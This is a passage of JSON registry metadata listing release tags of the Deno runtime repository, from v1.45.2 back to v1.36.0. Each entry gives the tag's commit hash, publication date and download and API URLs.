2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_u